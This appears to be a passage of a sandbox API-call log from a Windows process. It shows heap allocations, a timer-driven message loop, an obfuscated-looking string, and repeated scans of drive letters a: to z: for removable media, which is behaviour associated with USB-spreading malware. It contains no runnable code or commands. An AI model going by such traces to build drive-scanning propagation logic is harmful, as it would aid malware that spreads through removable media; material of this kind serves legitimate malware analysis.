(HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.936] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.936] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.936] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.936] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.936] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.937] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.938] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.938] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.938] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.938] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.938] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.939] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.939] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.939] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.940] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.940] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.940] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.940] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.940] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.941] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.941] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.941] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.942] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.942] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.942] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.943] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0216.943] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0216.943] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0216.943] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.943] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.944] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.944] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.944] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.944] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.945] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.945] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.945] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.945] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.948] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.949] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.950] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.951] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.952] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.952] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0216.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0216.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.953] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.954] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.954] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0216.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.958] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.958] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.959] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.959] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.959] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.959] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.959] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.959] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.960] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.960] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.960] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.960] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.960] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.961] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.961] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.961] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.961] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.961] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.962] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.962] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.962] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.962] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.962] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.963] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.963] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.963] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.963] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.964] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.964] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.964] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.964] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0216.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.965] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.965] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.965] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.966] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 